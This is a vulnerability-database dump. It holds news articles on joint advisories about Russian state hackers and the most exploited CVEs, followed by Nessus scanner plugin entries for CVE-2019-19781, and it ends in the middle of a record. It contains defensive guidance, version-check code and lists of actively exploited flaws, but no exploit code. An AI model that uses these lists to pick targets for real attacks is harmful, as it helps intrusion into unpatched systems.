"[](<https://thehackernews.com/images/-W51kRhVBeW0/YJaCznsmgiI/AAAAAAAACfU/z7fgy604zAcZllL9m6sPApy3bUHHX9YEQCLcBGAsYHQ/s0/hacker.jpg>)\n\nCyber operatives affiliated with the Russian Foreign Intelligence Service (SVR) have switched up their tactics in response to previous [public disclosures](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) of their attack methods, according to a [new advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>) jointly published by intelligence agencies from the U.K. and U.S. Friday.\n\n\"SVR cyber operators appear to have reacted [...] by changing their TTPs in an attempt to avoid further detection and remediation efforts by network defenders,\" the National Cyber Security Centre (NCSC) [said](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>).\n\nThese include the deployment of an open-source tool called [Sliver](<https://github.com/BishopFox/sliver>) to maintain their access to compromised victims as well as leveraging the ProxyLogon flaws in Microsoft Exchange servers to conduct post-exploitation activities.\n\nThe development follows the [public attribution](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) of SVR-linked actors to the [SolarWinds](<https://thehackernews.com/2021/04/researchers-find-additional.html>) supply-chain attack last month. The adversary is also tracked under different monikers, such as Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium.\n\nThe attribution was also accompanied by a technical report detailing five vulnerabilities that the SVR's APT29 group was using as initial access points to infiltrate U.S. and foreign entities.\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway\n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\n\"The SVR targets organisations that align with Russian foreign intelligence interests, including governmental, think-tank, policy and energy targets, as well as more time bound targeting, for example [COVID-19 vaccine](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>) targeting in 2020,\" the NCSC said.\n\nThis was followed by a separate guidance on April 26 that [shed more light](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) on the techniques used by the group to orchestrate intrusions, counting password spraying, exploiting zero-day flaws against virtual private network appliances (e.g., CVE-2019-19781) to obtain network access, and deploying a Golang malware called WELLMESS to plunder intellectual property from multiple organizations involved in COVID-19 vaccine development.\n\nNow according to the NCSC, seven more vulnerabilities have been added into the mix, while noting that APT29 is likely to \"rapidly\" weaponize recently released public vulnerabilities that could enable initial access to their targets.\n\n * [**CVE-2019-1653**](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) \\- Cisco Small Business RV320 and RV325 Routers\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) \\- Oracle WebLogic Server\n * [**CVE-2019-7609**](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) \\- Kibana\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) \\- F5 Big-IP\n * [**CVE-2020-14882**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) \\- Oracle WebLogic Server\n * [**CVE-2021-21972**](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) \\- VMware vSphere\n * [**CVE-2021-26855**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) \\- Microsoft Exchange Server\n\n\"Network defenders should ensure that security patches are applied promptly following CVE announcements for products they manage,\" the agency said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-08T12:24:00", "type": "thn", "title": "Top 12 Security Flaws Russian Spy Hackers Are Exploiting in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-21972", "CVE-2021-26855"], "modified": "2021-05-11T06:23:38", "id": "THN:1ED1BB1B7B192353E154FB0B02F314F4", "href": "https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEivOb0--JbZm0DKk17OtegvDf0JMgVq1rnkokni7RLCsqEBf17tLvxhVDjVCC8yZeN6jpVJCkJlb3GTbW4f29ZlHKK9dZKnxCnVgFaE0N7nhOJe9r3HRvLR-reRBzNHAdx6aUoQDU5yI90E1LqRdEM3guLQQv95JsKCUSy1ZAoTckx4Q4_Vb6CxtXGe>)\n\nAmid renewed tensions between the U.S. and Russia over [Ukraine](<https://apnews.com/article/joe-biden-europe-russia-ukraine-geneva-090d1bd24f7ced8ab84907a9ed031878>) and [Kazakhstan](<https://thehill.com/policy/international/588860-tensions-between-us-russia-rise-over-military-involvement-in-kazakhstan>), American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.\n\nTo that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and [exploiting known vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) to gain initial access to target networks.\n\nThe list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are \"common but effective,\" are below \u2014\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (FortiGate VPNs)\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) (Cisco router)\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (Oracle WebLogic Server)\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) (Kibana)\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) (Zimbra software)\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) (Exim Simple Mail Transfer Protocol)\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (Pulse Secure)\n * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (Citrix)\n * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (Microsoft Exchange)\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) (VMWare)\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (F5 Big-IP)\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (Oracle WebLogic)\n * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) (Microsoft Exchange, exploited frequently alongside [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\n\"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/11/cisa-fbi-and-nsa-release-cybersecurity-advisory-russian-cyber>).\n\n\"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments \u2014 including cloud environments \u2014 by using legitimate credentials.\"\n\nRussian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized [SolarWinds Orion updates](<https://thehackernews.com/2021/12/solarwinds-hackers-targeting-government.html>) to breach the networks of U.S. government agencies.\n\nTo increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.\n\n\"Consider using a centralized patch management system,\" the advisory reads. \"For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.\"\n\nOther recommended best practices are as follows \u2014\n\n * Implement robust log collection and retention\n * Require accounts to have strong passwords\n * Enable strong spam filters to prevent phishing emails from reaching end-users\n * Implement rigorous configuration management programs\n * Disable all unnecessary ports and protocols\n * Ensure OT hardware is in read-only mode\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T09:14:00", "type": "thn", "title": "FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-01-12T10:47:49", "id": "THN:3E9680853FA3A677106A8ED8B7AACBE6", "href": "https://thehackernews.com/2022/01/fbi-nsa-and-cisa-warns-of-russian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-23T14:12:59", "description": "Art Manion and Will Dormann report :\n\nBy using an older and less-secure form of open(), it is possible for untrusted template files to cause reads/writes outside of the template directories. This vulnerability is a component of the recent Citrix exploit.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-15T00:00:00", "type": "nessus", "title": "FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2023-01-19T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:p5-Template-Toolkit", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "href": "https://www.tenable.com/plugins/nessus/132879", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132879);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/19\");\n\n script_cve_id(\"CVE-2019-19781\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0122\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0742\");\n\n script_name(english:\"FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Art Manion and Will Dormann report :\n\nBy using an older and less-secure form of open(), it is possible for\nuntrusted template files to cause reads/writes outside of the template\ndirectories. This vulnerability is a component of the recent Citrix\nexploit.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.kb.cert.org/vuls/id/619785/\");\n # https://vuxml.freebsd.org/freebsd/2bab995f-36d4-11ea-9dad-002590acae31.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e74959bf\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Citrix ADC (NetScaler) Directory Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:p5-Template-Toolkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"p5-Template-Toolkit<3.004\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-09T15:01:38", "description": "The version of Citrix ADC or Citrix NetScaler Gateway SSL VPN running on the remote web server is affected by a path traversal vulnerability that can lead to remote code execution. An unauthenticated, remote attacker can exploit this issue, by sending a specially crafted HTTP request to perform a path traversal that can lead to acheiving remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-09T00:00:00", "type": "nessus", "title": "Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 